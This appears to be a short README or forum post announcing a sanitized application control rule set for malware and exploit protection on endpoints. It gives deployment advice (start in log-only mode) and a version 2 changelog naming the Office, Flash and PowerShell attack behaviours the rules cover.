This is version no.1 (will be updated in the future)
I have exported a sanitized(from my organizations data) application control rule which covers most of the malware and ATP detection and protection that I
have learned and used.
Tested in a large - 5000+ endpoints environment on endpoints and servers
******** You should use this rule as TEST (LOG ONLY) at first - it is important to make all the nessasary exceptiosn for your organization ********
After you get rid of the false positives you have two options:
1) make it production
2) make all sub-rules "continue with logging" and start changing the rules to "block" with time
Hope it helps you all!!
______________________________________________________________________________________________
Updated the rules - version 2
The big tunes and updates:
OFFICE malicious behaviour protection - covers the resent attack that used CVE-2017-11882(office), CVE-2018-4878(flash)
Internet Browsers malicious behaviour protection - covers the resent attack that used CVE-2018-4878(flash)
Fileless powershell malicious behaviour protection - covers script file or string download